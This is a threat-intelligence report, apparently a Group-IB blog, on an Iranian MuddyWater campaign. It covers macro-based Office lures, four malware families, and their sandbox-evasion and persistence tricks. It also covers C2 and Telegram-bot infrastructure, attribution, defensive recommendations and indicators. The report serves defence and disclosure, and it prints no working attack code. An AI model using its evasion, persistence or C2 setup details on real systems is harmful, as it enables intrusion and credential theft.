Operation Olalampo: Inside MuddyWater’s Latest Campaign

Introduction

The Group-IB Threat Intelligence Team has identified a new cyber campaign attributed with high confidence to the Iranian threat actor known as MuddyWater. This campaign, dubbed Operation Olalampo, targeted multiple organizations and individuals primarily across the MENA region, aligning with the ongoing geopolitical tensions.

First observed on 26 January 2026, the operation involved the deployment of several novel malware variants exhibiting tactical and technical overlap with samples previously attributed to the MuddyWater threat group. Notably, one variant leveraged a Telegram bot as a command-and-control (C2) channel.

Monitoring of this Telegram C2 bot revealed valuable insight into MuddyWater’s post-exploitation activity, including executed commands, deployed tools, and data collection techniques. The bot’s activity also exposed limited historical usage in late 2025, indicating infrastructure reuse rather than a separate campaign, while the core tradecraft remains consistent with MuddyWater’s known operations.

Key discoveries

• A targeted campaign primarily impacting organizations in the MENA region.
• Discovery of four new malware variants: a rust backdoor dubbed CHAR and two downloaders called GhostFetch and HTTP_VIP, in addition to an advanced backdoor called GhostBackDoor.
• Indicators suggesting AI-assisted malware development.
• Use of Telegram bot as a C2 channel, exposing post-exploitation activity.
• Discovery of the HTTP_VIP Custom python C2 server and its installation setup along with infected victims.
• Infrastructure overlap linking the campaign to historical MuddyWater operations dating back to October 2025.

Who may find this blog interesting:

• Cyber Threat Intelligence and Threat Hunting Specialists.
• Cybersecurity Analysts and Corporate Security Teams.
• National Cybersecurity Centers and Intelligence Agencies.
• Computer Emergency Response Teams (CERTs).
• Malware and reverse engineering analysts.

MuddyWater: Threat Intelligence Overview

MuddyWater is a well-known Iranian-linked threat actor that has been active for several years, primarily targeting government, telecommunications, energy, and critical infrastructure sectors across the Middle East and beyond. The group is known for its use of spear-phishing campaigns, custom malware, and consistent post-exploitation tradecraft, and has been the subject of multiple public and private threat intelligence reports.

Group-IB customers can access comprehensive and up-to-date intelligence on MuddyWater — including infrastructure, tooling, indicators, and activity tracking — via the Group-IB Threat Intelligence Portal.

Additional technical details on malware referenced in this report are also available through Group-IB’s Malware Database and Malware Detonation Platform, which provides behavioural analysis and sandbox reports for known samples.

Malware Profiles

Technical Analysis

The campaign involved multiple attacks against organizations and individuals primarily across the MENA region starting around 26 January 2026. This operation comes in alignment with the current geopolitical escalation in the region.

These attacks follow similar patterns and align with the killchains previously observed in MuddyWater attacks; starting with a phishing email with microsoft office document attached to it that contain malicious macro code that decodes the embedded payload and drops it on the system and executes it, providing the adversary with remote control of the system. Although delivery methods across various attacks had similarities, multiple final payloads were observed including HTTP_VIP, GhostBackDoor, and CHAR. Furthermore, the analysis showed that in addition to phishing, MuddyWater actively sought to exploit recently disclosed vulnerabilities on public-facing servers.

Figure 1. Overview of the Infection Attack Flow

Microsoft Office Documents

As part of Operation Olalampo, MuddyWater relied on various malicious Microsoft Office documents for malware delivery, tailored for distinct targets. Multiple document variants were observed during the campaign, all following the same macro-based execution logic with minor implementation differences.

Variant #1: Excel Document With Accounting Tables

The first observed variant is a malicious Microsoft Excel document mimicking an energy and marine services company in the Middle East. The targets of this variant are likely to be contractors associated with this organization or the organization itself. This variant leads to the deployment of CHAR backdoor.

Figure 2. Malicious Microsoft Excel Before Enabling Macros

Macro Functionality:

1. Execution begins with the Workbook_Open event, which automatically triggers the main subroutine when the Excel file is opened, provided that macros are enabled.
2. The macros will then decode the payload and drop it to the path “C:\Users\Public\Downloads\novaservice.exe.”
3. The final payload is CHAR rust backdoor that uses telegram bot as a C2 server.

Variant #2

This variant also adopts the theme for the same energy and marine services company from Variant #1 and targets are likely to be contractors related to the target company or the target company itself, the document leads to the deployment of the GhostFetch Downloader which subsequently downloads GhostBackDoor.

Figure 3. Malicious Microsoft Excel Shown on Variant #2

Macro Functionality:

1. Execution begins with The Workbook_Open() subroutine, which runs automatically when the Excel workbook is opened and macros are enabled.
2. The script enters a wait() function that executes a nested loop structure to evade sandbox hooks for sleep functions.
3. Next, the macro retrieves a decimal-encoded string stored in a hidden UI element (UserForm1.TextBox1.Text). Then decode it and finally drop it to C:\Users\Public\Documents\MicrosoftExcelUser.exe and execute it.
4. The dropped payload is GhostFetch Downloader which then deploys GhostBackDoor.

Variant #3

The third variant is a Microsoft Word document carrying multiple themes such as flight tickets and reports. The targets of this variant seem to be individuals of interest and system integrator companies in the middle east. This variant leads to the deployment of  HTTP_VIP Downloader which then deploys Anydesk RMM

Macro Functionality:

1. Execution begins with The Workbook_Open() subroutine, which runs automatically when the Excel workbook is opened and macros are enabled.
2. The script enters a wait() function that executes a nested loop structure to evade sandbox hooks for sleep functions
3. Next, the macro retrieves a decimal-encoded string stored in a hidden UI element (UserForm1.TextBox1.Text). Then decode it and finally drop it to C:\Users\<usernane>\Downloads\pic.LOG or C:\Users\Public\Documents\MicrosoftWordUser.exe and execute it.
4. The dropped payload is HTTP_VIP Downloader that will download Anydesk RMM tool.

Dropped Payloads

The malicious document variants drop three distinct types of malware: two downloaders, named GhostFetch and HTTP_VIP, and one backdoor developed in Rust called CHAR according to its PDB path.

GhostFetch (Downloader):

GhostFetch is a first-stage downloader designed to fetch and execute secondary payloads directly in memory.

Once the malware is executed, it will check if the command-line argument “static” is passed, and if so, it will start “explorer.exe shell:RecycleBinFolder”.

Anti-Analysis & Evasion

The malware is extremely sensitive to sandbox environments. It terminates immediately if it detects:

• Hardware Profiles: RAM < 2 GB, < 2 CPU cores, or fewer than 2 previously connected USB devices.
• User Activity: It validates mouse movements and checks screen resolution.
• Analysis Tools: It scans for debuggers, virtual machine artifacts, and AV software.
• Execution Timing: Uses GetTickCount64 to detect if it is being stepped through by an analyst.

Persistence & Delivery

• Path: Copies itself to %LOCALAPPDATA%\microsoft\windows\burnutill\burn.exe but after minor edit so the hash searching of the file will not be valid as it will have different hash.
• Registry: Maintains persistence via the User Shell Folders\Startup path.
• Mechanism: Decodes a hardcoded C2 list (primary: promoverse[.]org) to download an AES-encrypted PE file. It then reflectively loads this payload into memory.

The malware exhibits a behavior in which it attempts to re-execute itself multiple times after successfully fetching a second-stage payload from its command-and-control (C2) server. This is likely to retrieve any additional second-stage payloads the C2 might offer. This recurrent execution generates significant system noise, which could potentially trigger alerts for the security team. The exact reasoning behind this noisy, repeated self-execution remains unclear.

Figure 5. GhostFetch Malware Process Tree

GhostBackDoor (GhostFetch downloaded Second Stage):

The second stage is a sophisticated backdoor that adapts its installation based on the  environment’s privileges:

• Administrative Access: Installs as a service named MicrosoftVersionUpdater.
• Security Tools Present: Masks itself using the Windows Recycle Bin ClassID ({645FF040-5081-101B-9F08-00AA002F954E}).
• Standard User: Defaults to the startup registry folder.

Command & Control (C2) Functions

Communications are AES-encrypted and use French-named API endpoints. The malware utilizes a granular command structure to evade network detection:

The malware supports various commands, but its most notable feature is the fragmentation of operations. By using one command to spawn a command shell and distinct commands to interact with it, the malware fragments its network traffic. This behavior is likely designed to evade network detection engines and cause incomplete or delayed alerting.

HTTP_VIP (Downloader):

The HTTP_VIP malware is a native downloader that serves as a bridge for further exploitation. Its execution flow is highly selective:

1. System Reconnaissance: Upon execution, it harvests the local username and computer name.
2. Domain Guardrail: The malware performs a check for a hardcoded company domain belonging to a health care provider. If the infected machine is joined to this domain, the malware terminates execution. Further investigation revealed that the domain is associated with a honeypot, which the threat actor appears to have intentionally excluded.
3. C2 Authentication: It connects to a command-and-control (C2) server “codefusiontech[.]org” to authenticate.
4. Payload Deployment: It retrieves a file from the C2, writes it to a local directory, and executes it. In observed cases, the dropped payload is the legitimate AnyDesk RMM tool, used to provide the attacker with direct remote access.

New HTTP_VIP Variant

A new variant of the HTTP_VIP malware has been identified based on its PDB path and significant code similarities with earlier versions. Both variants share nearly identical initialization routines, including API resolution, system information collection, and C2 communication pattern — specifically the use of the /postifo URI to send victim information and /connect to retrieve instructions. The observation of two variants being deployed during Operation Olalampo suggests rapid development and a fast-paced nature to the operation.

While the previously observed version acted as a downloader for a second-stage payload (specifically the AnyDesk RMM tool), the new identified variant operates as a standalone backdoor. It is capable of receiving and executing the following commands:

CHAR (Rust Backdoor)

This is a rust backdoor that represents a tactical shift for MuddyWater, utilizing a Rust-based backdoor controlled via Telegram bot.

Below are the malicious commands supported by the C2:

• CMD: execute a CMD command
• PowerShell: execute a PowerShell command
• Change directory

Analysis of the malware artifacts reveals that one of the command handlers exhibits signs of AI-assisted development. This aligns with recent reports from the Google Threat Intelligence team regarding MuddyWater’s use of Gemini to write malware. Specifically, we identified debug strings containing emojis — a trait rarely seen in human-authored code. We observed four instances of this anomaly, suggesting that the adversary likely used an AI model to generate specific code segments and failed to sanitize the debug strings before compilation; this can also be seen in the command-and-control logs from the telegram bot.

Infrastructure Analysis

While the CHAR backdoor leverages Telegram API as its command-and-control (C2) channel, the GhostBackDoor and HTTP_VIP malware communicates with a threat actor-controlled C2 servers, infrastructure analysis provides a unique insight into offensive cyber operations and helps understand the bigger picture of the attack. By understanding the C2 infrastructure, organizations can proactively defend against attacks by identifying adversarial infrastructure before attack launch. This intelligence is also valuable for attributing these attacks.

C2 Server Analysis

GhostFetch C2 Infrastructure

The domain promoverse[.]org was used by the GhostFetch loader and the associated GhostBackDoor in this campaign. The C2 server was protected with cloudflare, however the real IP address was identified as 209[.]74[.]87[.]67 using Group-IB Threat Intelligence Portal. The URL endpoints used by the malware are described in the malware analysis section above.

Analysis revealed a direct link to previously observed MuddyWater infrastructure, specifically the domain (netvigil[.]org), which hosted identical HTML content as shown below and was used in earlier campaigns alongside the GhostFetch and GhostBackDoor malware back in October 2025.

Figure 8. HTML content served during active C2 operation

Additionally, a decoy website was observed on the server site that presents itself as “Promoverse – Digital Marketing & Brand Promotion” and runs on the server stack Werkzeug/3.1.5 Python/3.12.3. Based on its structure and content, the site is highly likely to have been generated using AI. Despite its legitimate appearance, the site is a single non-functional HTML webpage; its buttons serve only to scroll the page and lead nowhere outside. And social media buttons are empty as well.

Figure 9. Decoy site observed on the C2 server.

C2 Timeline Summary:

The short operational window of the GhostFetch C2 infrastructure suggests that the threat actor either deploys additional tools following the initial compromise or dynamically rotates C2 servers during later stages of the intrusion.

HTTP_VIP C2 Infrastructure

Two domains were used by HTTP_VIP samples; miniquest[.]org and codefusiontech[.]org.

The domain miniquest[.]org was registered via NameCheap on 2026-01-27T12:44:23Z and was protected with CloudFlare. The real IP address was identified as 159[.]198[.]43[.]141 via the SSL certificate using Group-IB Threat Intelligence Platform:

The C2 is served using Werkzeug/3.1.5 Python/3.12.3 backend, below a detailed description is available for how the C2 is being set up.

C2 Timeline Summary:

The domain codefusiontech[.]org was registered via NameCheap on 2026-02-02T06:24:36.42Z, and was protected with CloudFlare as well. The real IP address was identified as 209[.]74[.]87[.]100 via the SSL certificate using Group-IB Threat Intelligence Platform:

The C2 infrastructure was  served using a Werkzeug/3.1.5 Python/3.12.3 backend.  A detailed description of the C2  setup is provided below.

C2 Timeline Summary:

An open directory was discovered on the  same IP address, containing several RMM and post-exploitation tools. The root directory listing exposes FMAPP.exe / FMAPP.dll, which have also been observed in previous MuddyWater open-directory findings. The directory was exposed using a Python Simple HTTP server (SimpleHTTP/0.6 Python/3.12.3).

Figure 12. Directory listing captured on 209[.]74[.]87[.]100 domain

During infrastructure analysis, we were able to obtain the source code running on the C2 server for HTTP_VIP. The C2 server supporting this malware is a custom-built web app using the Flask Python framework. It manages HTTP_VIP malware connections and maintains an sqlite database containing a list of compromised hosts.

In addition to the source code of HTTP_VIP server we obtained the following:

• AnyDesk Binaries: Legitimate remote access tools used for direct control of infected hosts.
• FMAPP.dll: A malicious injector used to deploy a SOCKS5 reverse proxy, allowing the attacker to tunnel network traffic through the infected host.

The server offers multiple API endpoints for the HTTP_VIP loader operation:

The server performs IP-based geolocation to identify the victim’s country using IP info service:

Figure 13. HTTP_VIP C2 server logic for determining victim location

We also  identified a command history file detailing  how the C2 server is deployed. This helps explain our observations in the previously analyzed infrastructure, where  the active C2 server was observed on a python-based backend during the operational timeframe, after which Apache returned 503 error pages instead, once the operation ended.

The setup works as follows:

1. Apache is deployed and listens on ports 80 and 443, often serving a decoy website, or no content.
2. The Python based C2 backend is deployed on port 8080.
3. Ports 80 and 443 are allowed through the linux firewall, while port 8080 is blocked to prevent direct external access. Additionally, in some cases the Python C2 is bound to 127.0.0.1, making it not accessible from the internet.
4. Incoming requests are received by Apache and internally forwarded to the python-based C2 HTTP server, enabling functional C2 communication.
5. Once the Python backend is stopped, Apache returns 503 error messages.

In effect, Apache functions as a front-end reverse proxy and TLS terminator, while the Python application operates as a local backend service accessible only via the loopback interface. Traffic routing is handled through Apache’s mod_proxy modules, creating a layered and secure web stack on a single host.

Another notable artifact in the command history is the command “فئعط” which corresponds to the “tmux” command mistakenly typed while using another language. The Keyboard mapping indicates the language was set to Persian, which further strengthened the attribution.

Figure 14. Keyboard mapping between english and persian for the “tmux” command

The original command history shows the detailed deployment process:

C2 Telegram Bot Analysis

The Telegram bot used for C2 communication by the newly discovered CHAR malware provided a valuable source of intelligence. During the analysis of the sample of this malware, Group-IB Threat Intelligence Team discovered the name of the C2 Telegram bot, which revealed detailed information about MuddyWater operations and provided visibility into their hands-on keyboard activity and specific command sequences and post-exploitation TTPs.

The bot’s first display name is Olalampo, and its username is stager_51_bot.

Figure 15. C2 Telegram bot information

The threat actor utilized the bot in two different timeframes, the first activity was observed in early October 2025 specifically between 6 of October and 12 of October. And the second in late January where the bot had a slightly different functionality:

2026-01-28 → 2026-02-01

2025-10-06 → 2025-10-12

Bot analysis revealed the execution of multiple Powershell commands as detailed below.

Observed Command Execution

Monitoring of the Telegram bot activity revealed the execution of multiple PowerShell commands indicative of post-exploitation activity.

Command #1 –  Observed: 2025-10-12 08:46:28 and 2025-10-06 12:47:41

The command attempts to execute FMAPP.exe under a new process. This is a legitimate executable that will sideload FMAPP.dll which could be a reverse socks5 proxy or Kalim backdoor, since both were observed in samples with that name.

Decoded:

Command #2 – Observed: 2025-10-06 12:40:18

This command attempts to upload a file named cobe-notes.txt to an adversary-controlled C2 server. This file is noteworthy because it was previously observed in MuddyWater campaigns. It is known to contain credentials stolen by a custom browser infostealer employed by MuddyWater in earlier operations.

Decoded:

Command #3 – Observed: 2025-10-06 12:35:21

The command attempts to execute sh.exe under a new process. The binary could not be retrieved during analysis.

Decoded:

Command #4 – Observed: 2025-10-06 11:47:03

The command attempts to run gshdoc_release_X64_GUI.exe under a new process. While the binary itself remains unidentified, its execution output was observed directly.

Decoded:

We’ve also observed direct execution of gshdoc_release_X64_GUI.exe and the output it produced as follows:

List of Executed Commands

The executed commands indicate basic reconnaissance activity, including enumeration of the current user, domain membership, privileges, and IP configuration. Additional actions include local network scanning via ping, creation of scheduled tasks, and the ingress tool transfer which are then executed.

Potential Threat Actor Information

Analysis of the bot logs suggests that the threat actor tested the backdoor on their own machine prior to the  second operation in late January 2026. Several commands (shown below) appear to have been executed by the bot, potentially on the threat actor machine, as evidenced by usernames and directory paths identified in the logs.

The username DontAsk was observed as the “author” and “last modified by” in the malicious Microsoft Office documents used in phishing emails. Additionally, the username Jacob was observed in previous malware samples within the PDB paths and embedded strings.

The information above shows that DontAsk is a standard local user and the machine is not a part of any domain, and the hostname is desktop-9524r2b.

An interesting note here is the domain name for the user jacob, which is ultra.

The current working directory appears to correspond to the build path where the CHAR backdoor was compiled in release mode. In addition, strings extracted from the CHAR binary reference the username Jacob, consistent with paths associated with Rust library locations. The same paths were observed in the BlackBeard malware attributed to MuddyWater.

Figure 16. CHAR and BlackBeard malware Development Environment.

This activity suggests that the threat actor likely used the Telegram bot to test the backdoor’s functionality prior to the operation, during the period between 2026-01-28 12:42:10 and 2026-01-28 15:22:35 (UTC+3). This timeframe aligns with the preparation phase observed ahead of the January campaign.

Attribution Assessment

Group-IB attributes this campaign to MuddyWater with high confidence based on several factors and evidences as outlined below:

• The C2 server hosts a malicious Reverse socks5 malware (FMAPP.dll, hash: 62ED16701A14CE26314F2436D9532FE606C15407) similar to the reverse socks5 mentioned in this report [1].
• The Malicious macros match the logic consistent with observed in multiple recent MuddyWater campaigns. “02ccc4271362b92a59e6851ac6d5d2c07182064a602906d7166fe2867cc662a5”.
  • Read “UserForm1.TextBox1.Text” and decode it using the same way,
  • Using the same sleep method (4 nested loop for add operation),
  • Drop a file to the .log file wither in public user directory or current user download directory,
  • Executing the dropped file.
• The GhostFetch and GhostBackDoor employ the same string decoding techniques observed in other MuddyWater-linked malware.
• The CHAR malware has similar structure and development environment as the Rust-based malware BlackBeard (aka “Archer RAT”, sha-1: 326b808f4f933f20e4e8686e9a6e93454c8ed334).,
• Post-exploitation activity strongly matching MuddyWater’s known toolset and operational patterns.
• Infrastructure overlap with previously identified MuddyWater C2 infrastructure (netvigil[.]org).

Conclusion

The MuddyWater APT group remains an active threat within the META region,with this operation primarily targeting organizations in the MENA region. The group’s continued adoption of AI technology, combined with continued development of custom malware and tooling and diversified Command & Control (C2) infrastructures, underscores their dedication and intent to expand their operations.

The Group-IB Threat Intelligence team recognizes this threat and  continues to closely monitor its activity in order to provide actionable intelligence, enabling  organizations to anticipate evolving threats and strengthen their defensive posture accordingly .

Recommendations

Organizations can reduce exposure to MuddyWater-linked activity by implementing the following measures, informed by observed tactics and techniques used across the GhostFetch and related malware families.

Strengthen Threat Intelligence and Monitoring

• Conduct continuous threat hunting for indicators associated with GhostFetch, CHAR and related infrastructure.
• Integrate YARA Rules and  and Endpoint Detection and Response (EDR) detections for  known MuddyWater malware families. l
• Subscribe to threat intelligence feeds to receive up-to-date Indicators of Compromise (IOCs) and Tactics, Techniques, and Procedures (TTPs) related to MuddyWater.

Enhance Email and Phishing Defenses

• Disable Office macros by default through Group Policy, allowing execution only from signed or trusted sources, as the campaign originates from malicious document variants.
• Deploy advanced attachment sandboxing capable of simulating user interaction, as GhostFetch validates mouse movement and execution timing to evade automated analysis.
• Conduct regular phishing simulations and awareness training for personnel, emphasizing lures that prompt users to “enable content” in attached documents.

Implement Endpoint and Access Controls

• Restrict, monitor, and audit the use of remote monitoring and management (RMM) tools such as AnyDesk, which is leveraged as a secondary payload in this campaign.
• Deploy and tune EDR solutions to detect reflective code loading and in-memory execution, as GhostFetch decrypts AES-encrypted payloads and loads them directly into memory.
• Monitor for the creation of unauthorized services, such as MicrosoftVersionUpdater, and unusual modifications to the User Shell Folders\Startup registry path.

Strengthen Network and Infrastructure Security

• Monitor and, where appropriate, restrict outbound traffic to Telegram Bot API endpoints, as the CHAR backdoor relies on this service for command-and-control communications.
• Block known malicious domains, such as promoverse[.]org, and monitor for repeated beaconing or anomalous connections to suspicious endpoints.
• Use network behavioral analysis to identify SOCKS5 reverse proxy activity, particularly those introduced by injected modules such as FMAPP.dll.

Build Long-Term Strategic Defense

• Ensure internal analysis and sandbox environments are configured with more than 2 GB of RAM and at least 2 CPU cores to prevent malware like GhostFetch from identifying the environment as a sandbox and self-terminating.
• Enforce least-privilege access controls to limit the ability of malware to install itself as a system service or establish persistent access.

Indicators of Compromise (IOCs)

DISCLAIMER: All technical information, including malware analysis, indicators of compromise and infrastructure details provided in this publication, is shared solely for defensive cybersecurity and research purposes. Group-IB does not endorse or permit any unauthorized or offensive use of the information contained herein. The data and conclusions represent Group-IB’s analytical assessment based on available evidence and are intended to help organizations detect, prevent, and respond to cyber threats.

Group-IB expressly disclaims liability for any misuse of the information provided. Organizations and readers are encouraged to apply this intelligence responsibly and in compliance with all applicable laws and regulations.

This blog may reference legitimate third-party services such as Telegram and others, solely to illustrate cases where threat actors have abused or misused these platforms.